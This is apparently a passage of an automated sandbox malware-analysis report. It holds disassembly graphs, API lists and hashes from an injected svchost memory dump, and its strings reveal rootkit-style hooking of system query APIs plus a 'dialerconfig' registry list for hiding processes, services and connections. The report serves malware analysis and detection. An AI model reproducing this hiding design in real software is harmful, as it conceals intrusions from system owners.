                                                  • Part of subcall function 0000026F48141650: RegCloseKey.ADVAPI32 ref: 0000026F4814175C
                                                  • Part of subcall function 0000026F48141650: RegOpenKeyExW.ADVAPI32 ref: 0000026F4814177C
                                                  • Part of subcall function 0000026F48141650: RegCloseKey.ADVAPI32 ref: 0000026F48141797
                                                  • Part of subcall function 0000026F48141650: RegOpenKeyExW.ADVAPI32 ref: 0000026F481417B7
                                                  • Part of subcall function 0000026F48141650: RegCloseKey.ADVAPI32 ref: 0000026F481417D2
                                                  • Part of subcall function 0000026F48141650: RegOpenKeyExW.ADVAPI32 ref: 0000026F481417F2
                                                • Sleep.KERNEL32 ref: 0000026F48141C43
                                                • SleepEx.KERNELBASE ref: 0000026F48141C49
                                                  • Part of subcall function 0000026F48141650: RegCloseKey.ADVAPI32 ref: 0000026F4814180D
                                                  • Part of subcall function 0000026F48141650: RegOpenKeyExW.ADVAPI32 ref: 0000026F4814182D
                                                  • Part of subcall function 0000026F48141650: RegCloseKey.ADVAPI32 ref: 0000026F48141848
                                                  • Part of subcall function 0000026F48141650: RegOpenKeyExW.ADVAPI32 ref: 0000026F48141868
                                                  • Part of subcall function 0000026F48141650: RegCloseKey.ADVAPI32 ref: 0000026F48141883
                                                  • Part of subcall function 0000026F48141650: RegOpenKeyExW.ADVAPI32 ref: 0000026F481418A3
                                                  • Part of subcall function 0000026F48141650: RegCloseKey.ADVAPI32 ref: 0000026F481418BE
                                                  • Part of subcall function 0000026F48141650: RegCloseKey.ADVAPI32 ref: 0000026F481418C8
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                • String ID:
                                                • API String ID: 1534210851-0
                                                • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction ID: ba7a0680aca1b6097396dc8ef16d73effedf0e8f67c574bfc877db16a4ac741b
                                                • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction Fuzzy Hash: D331AEB52006A191FED09F26FB5D35B16A5ABC4FD8F1450339F3A87E96EE27C8D08250

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 57 26f48143930-26f4814393b 58 26f48143955-26f4814395c 57->58 59 26f4814393d-26f48143950 StrCmpNIW 57->59 59->58 60 26f48143952 59->60 60->58
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: dialer
                                                • API String ID: 0-3528709123
                                                • Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                • Instruction ID: eff1a7aee03a30e97bb5fe2f87625046466ec6f67d7186fe659e52bc7bfcaf39
                                                • Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                • Instruction Fuzzy Hash: 1AD05E7135168A86FFD49FA9E9896622350AB84B04F848032CB3503964EF1AC9CD8A10

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2629301431.0000026F47BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F47BD0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f47bd0000_svchost.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction ID: 7ddc2b2680c9a5ddce4fff25be5b549c171b19c2feb780793ca55ca44d11e2de
                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction Fuzzy Hash: EB61F33270569187FEACCF15E6447AAB3A1FB48BA4F548135EB1907B89DF3AD852C700

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 207 26f48142cdc-26f48142d55 call 26f4815ecc0 210 26f48143090-26f481430b3 207->210 211 26f48142d5b-26f48142d61 207->211 211->210 212 26f48142d67-26f48142d6a 211->212 212->210 213 26f48142d70-26f48142d73 212->213 213->210 214 26f48142d79-26f48142d89 GetModuleHandleA 213->214 215 26f48142d8b-26f48142d9b GetProcAddress 214->215 216 26f48142d9d 214->216 217 26f48142da0-26f48142dbe 215->217 216->217 217->210 219 26f48142dc4-26f48142de3 StrCmpNIW 217->219 219->210 220 26f48142de9-26f48142ded 219->220 220->210 221 26f48142df3-26f48142dfd 220->221 221->210 222 26f48142e03-26f48142e0a 221->222 222->210 223 26f48142e10-26f48142e23 222->223 224 26f48142e33 223->224 225 26f48142e25-26f48142e31 223->225 226 26f48142e36-26f48142e3a 224->226 225->226 227 26f48142e3c-26f48142e48 226->227 228 26f48142e4a 226->228 229 26f48142e4d-26f48142e57 227->229 228->229 230 26f48142f4d-26f48142f51 229->230 231 26f48142e5d-26f48142e60 229->231 232 26f48143082-26f4814308a 230->232 233 26f48142f57-26f48142f5a 230->233 234 26f48142e72-26f48142e7c 231->234 235 26f48142e62-26f48142e6f call 26f48141a14 231->235 232->210 232->223 238 26f48142f6b-26f48142f75 233->238 239 26f48142f5c-26f48142f68 call 26f48141a14 233->239 236 26f48142eb0-26f48142eba 234->236 237 26f48142e7e-26f48142e8b 234->237 235->234 242 26f48142ebc-26f48142ec9 236->242 243 26f48142eea-26f48142eed 236->243 237->236 241 26f48142e8d-26f48142e9a 237->241 245 26f48142fa5-26f48142fa8 238->245 246 26f48142f77-26f48142f84 238->246 239->238 250 26f48142e9d-26f48142ea3 241->250 242->243 251 26f48142ecb-26f48142ed8 242->251 252 26f48142eef-26f48142ef9 call 26f48141d28 243->252 253 26f48142efb-26f48142f08 lstrlenW 243->253 248 26f48142fb5-26f48142fc2 lstrlenW 245->248 249 26f48142faa-26f48142fb3 call 26f48141d28 245->249 246->245 255 26f48142f86-26f48142f93 246->255 259 26f48142fc4-26f48142fce 248->259 260 26f48142fe5-26f48142fef call 26f48143930 248->260 249->248 275 26f48142ffa-26f48143005 249->275 257 26f48142f43-26f48142f48 250->257 258 26f48142ea9-26f48142eae 250->258 261 26f48142edb-26f48142ee1 251->261 252->253 252->257 263 26f48142f2b-26f48142f3d call 26f48143930 253->263 264 26f48142f0a-26f48142f14 253->264 265 26f48142f96-26f48142f9c 255->265 268 26f48142ff2-26f48142ff4 257->268 258->236 258->250 259->260 269 26f48142fd0-26f48142fe3 call 26f48141554 259->269 260->268 261->257 270 26f48142ee3-26f48142ee8 261->270 263->257 263->268 264->263 273 26f48142f16-26f48142f29 call 26f48141554 264->273 274 26f48142f9e-26f48142fa3 265->274 265->275 268->232 268->275 269->260 269->275 270->243 270->261 273->257 273->263 274->245 274->265 280 26f4814307c-26f48143080 275->280 281 26f48143007-26f4814300b 275->281 280->232 284 26f48143013-26f4814302d call 26f481486a0 281->284 285 26f4814300d-26f48143011 281->285 286 26f48143030-26f48143033 284->286 285->284 285->286 289 26f48143035-26f48143053 call 26f481486a0 286->289 290 26f48143056-26f48143059 286->290 289->290 290->280 292 26f4814305b-26f48143079 call 26f481486a0 290->292 292->280
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                • API String ID: 2119608203-3850299575
                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction ID: 4025dfe6008443e31e864355acdb0df0d762dcba5fdafd9cf139e97290130a4b
                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction Fuzzy Hash: AFB15C722106D081EF958F29E658BAA63A4FB84F94F545027EF7953F94DE36C9C0C340

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                • String ID:
                                                • API String ID: 3140674995-0
                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction ID: 8f476f5d24f6658f3e0b8921e2153d67be11316824d99654f8adcd85deb8d95a
                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction Fuzzy Hash: 93313A72205AC486EBA09F64F8447EA7360F785B44F84442ADB6E47EA8EF39C588C710
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                • String ID:
                                                • API String ID: 1239891234-0
                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction ID: 901dff2f7e6f04cce7988970645566b64514ea551194aa7de3f2cd95ba923f73
                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction Fuzzy Hash: B1314A36204B8086EBA08F25F94479A73A4F789B54F900526EBAD47FA5DF39C5858B00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                • String ID:
                                                • API String ID: 1443284424-0
                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction ID: 8278442d33cc96729c9d697048d83ac9363f3d313aa239b5e8643e0731caa01e
                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction Fuzzy Hash: ECE1E072704AC08AEB80DFA5E2882DE7BB1F385788F144126DF6A57FA9DE35C556C700

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                • API String ID: 106492572-2879589442
                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction ID: 0feda6f5889ea005220ee92aa91a92338ab32245e70121e3e3d2e27acf8abcb7
                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction Fuzzy Hash: 3571F936310B9085FF909F65F95869A67A4F7C5B88F805132DB6D87E29EF3AC485C300

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                • String ID: d
                                                • API String ID: 2005889112-2564639436
                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction ID: d8b77e30d10187b6e238fb09d108d934aa8d5339bd8c808c5cc9b1a7f16a7319
                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction Fuzzy Hash: C2514972214B9492EB94DB66F68839AB3A1F7C9B80F448126DB6907F24DF39C095C700

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                • API String ID: 4175298099-1975688563
                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction ID: 8d530b5ad600678bded0f3ca32e8e8ab6ad46161c7cd0b0e038aafb259873732
                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction Fuzzy Hash: E63183B05519CAA1FE84EF65FB596D62321A7C4B84FC05433973A03D759E7AC2C9C390

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                • API String ID: 2171963597-1373409510
                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction ID: 83f3a500db1ece9cee6fb09c38b605b236212783faf565117bb27b34f9c2001d
                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction Fuzzy Hash: 2B21103661478082FB508B65F64835B67A0F7C9BA4F944226EB7907FA8DF3DC189CB00

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                • String ID: d
                                                • API String ID: 3743429067-2564639436
                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction ID: 5ac9bf650ce93fb90483a5336334412c2da3793bb5f4efa87313a72e79f75cd1
                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction Fuzzy Hash: E9416F33214BD097EBA48F65E54879BB7A1F389B84F408126DBA907F54DF39D1A4CB00

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 320 26f47bd69f0-26f47bd69f6 321 26f47bd69f8-26f47bd69fb 320->321 322 26f47bd6a31-26f47bd6a3b 320->322 324 26f47bd69fd-26f47bd6a00 321->324 325 26f47bd6a25-26f47bd6a64 call 26f47bd70a0 321->325 323 26f47bd6b58-26f47bd6b6d 322->323 328 26f47bd6b7c-26f47bd6b96 call 26f47bd6f34 323->328 329 26f47bd6b6f 323->329 326 26f47bd6a18 __scrt_dllmain_crt_thread_attach 324->326 327 26f47bd6a02-26f47bd6a05 324->327 340 26f47bd6a6a-26f47bd6a7f call 26f47bd6f34 325->340 341 26f47bd6b32 325->341 336 26f47bd6a1d-26f47bd6a24 326->336 332 26f47bd6a07-26f47bd6a10 327->332 333 26f47bd6a11-26f47bd6a16 call 26f47bd6fe4 327->333 343 26f47bd6b98-26f47bd6bcd call 26f47bd705c call 26f47bd6efc call 26f47bd73f8 call 26f47bd7210 call 26f47bd7234 call 26f47bd708c 328->343 344 26f47bd6bcf-26f47bd6c00 call 26f47bd7270 328->344 334 26f47bd6b71-26f47bd6b7b 329->334 333->336 353 26f47bd6b4a-26f47bd6b57 call 26f47bd7270 340->353 354 26f47bd6a85-26f47bd6a96 call 26f47bd6fa4 340->354 345 26f47bd6b34-26f47bd6b49 341->345 343->334 355 26f47bd6c02-26f47bd6c08 344->355 356 26f47bd6c11-26f47bd6c17 344->356 353->323 373 26f47bd6a98-26f47bd6abc call 26f47bd73bc call 26f47bd6eec call 26f47bd6f18 call 26f47bd90dc 354->373 374 26f47bd6ae7-26f47bd6af1 call 26f47bd7210 354->374 355->356 362 26f47bd6c0a-26f47bd6c0c 355->362 357 26f47bd6c5e-26f47bd6c74 call 26f47bd2858 356->357 358 26f47bd6c19-26f47bd6c23 356->358 381 26f47bd6cac-26f47bd6cae 357->381 382 26f47bd6c76-26f47bd6c78 357->382 363 26f47bd6c25-26f47bd6c2d 358->363 364 26f47bd6c2f-26f47bd6c3d call 26f47be2758 358->364 369 26f47bd6cff-26f47bd6d0c 362->369 370 26f47bd6c43-26f47bd6c58 call 26f47bd69f0 363->370 364->370 385 26f47bd6cf5-26f47bd6cfd 364->385 370->357 370->385 373->374 422 26f47bd6abe-26f47bd6ac5 __scrt_dllmain_after_initialize_c 373->422 374->341 393 26f47bd6af3-26f47bd6aff call 26f47bd7260 374->393 383 26f47bd6cb5-26f47bd6cca call 26f47bd69f0 381->383 384 26f47bd6cb0-26f47bd6cb3 381->384 382->381 390 26f47bd6c7a-26f47bd6c9c call 26f47bd2858 call 26f47bd6b58 382->390 383->385 402 26f47bd6ccc-26f47bd6cd6 383->402 384->383 384->385 385->369 390->381 415 26f47bd6c9e-26f47bd6ca6 call 26f47be2758 390->415 411 26f47bd6b25-26f47bd6b30 393->411 412 26f47bd6b01-26f47bd6b0b call 26f47bd7178 393->412 408 26f47bd6cd8-26f47bd6cdf 402->408 409 26f47bd6ce1-26f47bd6cf1 call 26f47be2758 402->409 408->385 409->385 411->345 412->411 423 26f47bd6b0d-26f47bd6b1b 412->423 415->381 422->374 424 26f47bd6ac7-26f47bd6ae4 call 26f47bd9078 422->424 423->411 424->374
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2629301431.0000026F47BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F47BD0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f47bd0000_svchost.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: 9b9b54fc7d13ade8a6b323c03a89cec80674c44a7caf2356ed6a231d4a5fa086
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: 9181B231609A8586FED8AB25B74939B66B0EB857C8F484035EF4583F9EDF3BC8459700

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 427 26f481475f0-26f481475f6 428 26f48147631-26f4814763b 427->428 429 26f481475f8-26f481475fb 427->429 430 26f48147758-26f4814776d 428->430 431 26f48147625-26f48147664 call 26f48147ca0 429->431 432 26f481475fd-26f48147600 429->432 436 26f4814776f 430->436 437 26f4814777c-26f48147796 call 26f48147b34 430->437 449 26f48147732 431->449 450 26f4814766a-26f4814767f call 26f48147b34 431->450 434 26f48147602-26f48147605 432->434 435 26f48147618 __scrt_dllmain_crt_thread_attach 432->435 440 26f48147611-26f48147616 call 26f48147be4 434->440 441 26f48147607-26f48147610 434->441 438 26f4814761d-26f48147624 435->438 442 26f48147771-26f4814777b 436->442 447 26f481477cf-26f48147800 call 26f48147e70 437->447 448 26f48147798-26f481477cd call 26f48147c5c call 26f48147afc call 26f48147ff8 call 26f48147e10 call 26f48147e34 call 26f48147c8c 437->448 440->438 459 26f48147811-26f48147817 447->459 460 26f48147802-26f48147808 447->460 448->442 453 26f48147734-26f48147749 449->453 462 26f48147685-26f48147696 call 26f48147ba4 450->462 463 26f4814774a-26f48147757 call 26f48147e70 450->463 465 26f4814785e-26f48147874 call 26f48143458 459->465 466 26f48147819-26f48147823 459->466 460->459 464 26f4814780a-26f4814780c 460->464 480 26f481476e7-26f481476f1 call 26f48147e10 462->480 481 26f48147698-26f481476bc call 26f48147fbc call 26f48147aec call 26f48147b18 call 26f48149cdc 462->481 463->430 470 26f481478ff-26f4814790c 464->470 488 26f48147876-26f48147878 465->488 489 26f481478ac-26f481478ae 465->489 471 26f48147825-26f4814782d 466->471 472 26f4814782f-26f4814783d call 26f48153358 466->472 477 26f48147843-26f48147858 call 26f481475f0 471->477 472->477 493 26f481478f5-26f481478fd 472->493 477->465 477->493 480->449 503 26f481476f3-26f481476ff call 26f48147e60 480->503 481->480 530 26f481476be-26f481476c5 __scrt_dllmain_after_initialize_c 481->530 488->489 490 26f4814787a-26f4814789c call 26f48143458 call 26f48147758 488->490 491 26f481478b5-26f481478ca call 26f481475f0 489->491 492 26f481478b0-26f481478b3 489->492 490->489 523 26f4814789e-26f481478a6 call 26f48153358 490->523 491->493 511 26f481478cc-26f481478d6 491->511 492->491 492->493 493->470 514 26f48147725-26f48147730 503->514 515 26f48147701-26f4814770b call 26f48147d78 503->515 518 26f481478e1-26f481478f1 call 26f48153358 511->518 519 26f481478d8-26f481478df 511->519 514->453 515->514 529 26f4814770d-26f4814771b 515->529 518->493 519->493 523->489 529->514 530->480 531 26f481476c7-26f481476e4 call 26f48149c78 530->531 531->480
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: f72babb935fee18d8c9d9c7d6c840307578cc8e4329242e2ae7cd8dd12da23b8
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: 198180316042CA85FED0AB69B64D36B6291A7C5F80F544C379B3597FA6DF3AC8C58700

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 534 26f48149804-26f48149842 535 26f48149933 534->535 536 26f48149848-26f4814984b 534->536 537 26f48149935-26f48149951 535->537 536->537 538 26f48149851 536->538 539 26f48149854 538->539 540 26f4814992b 539->540 541 26f4814985a-26f48149869 539->541 540->535 542 26f48149876-26f48149895 LoadLibraryExW 541->542 543 26f4814986b-26f4814986e 541->543 546 26f481498ed-26f48149902 542->546 547 26f48149897-26f481498a0 call 26f48153080 542->547 544 26f48149874 543->544 545 26f4814990d-26f4814991c GetProcAddress 543->545 550 26f481498e1-26f481498e8 544->550 545->540 549 26f4814991e-26f48149929 545->549 546->545 548 26f48149904-26f48149907 FreeLibrary 546->548 553 26f481498cf-26f481498d9 547->553 554 26f481498a2-26f481498b7 call 26f4814ad28 547->554 548->545 549->537 550->539 553->550 554->553 557 26f481498b9-26f481498cd LoadLibraryExW 554->557 557->546 557->553
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                • String ID: api-ms-
                                                • API String ID: 2559590344-2084034818
                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction ID: 853872dc391dd9b499113e76563f507fa7b886fa3bf84a016bfb3060f1047882
                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction Fuzzy Hash: 9131C271202BD091FE92DB16FA0879A6394BB89FA4F590536EF3D47BA1DF39C0858300

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                • String ID: CONOUT$
                                                • API String ID: 3230265001-3130406586
                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction ID: 51b846eec42041f346ea40fe3cf0891c0b4248e5707a533d979b78e85c13743c
                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction Fuzzy Hash: 5B118B31214B8086FB909B56F95831AA2A0F3C9BE4F400236EB7987BA4CF7AC9448740
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: Thread$Current$Context
                                                • String ID:
                                                • API String ID: 1666949209-0
                                                • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction ID: 7b0e80c998ee880d654b37696eba2a0948381147c1b08b3f2d3b1c2e78d19020
                                                • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction Fuzzy Hash: 6ED17C76209B8885EEB09B19F59435B77A0F7C8F84F140526EBAE47BA5DF39C581CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID: dialer
                                                • API String ID: 756756679-3528709123
                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction ID: b6404912e6c1473b82eb836b7214aeddb66cac03fafc7b10dbb3ee9a9587b809
                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction Fuzzy Hash: D4316031701B9592FF959F5ABA48A6A63A0FB85F94F0441329F7A07F54EF3AC4A18700
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                • String ID:
                                                • API String ID: 517849248-0
                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction ID: f3166ca4b5420848e1af49b5022b76038be322e8bbeb26f8073b08130f5955aa
                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction Fuzzy Hash: D9015B31300A8196FA90DB26B59C35A63A1F789FC0F984436CFA943B64DE3AC9858700
                                                APIs
                                                Memory Dump Source
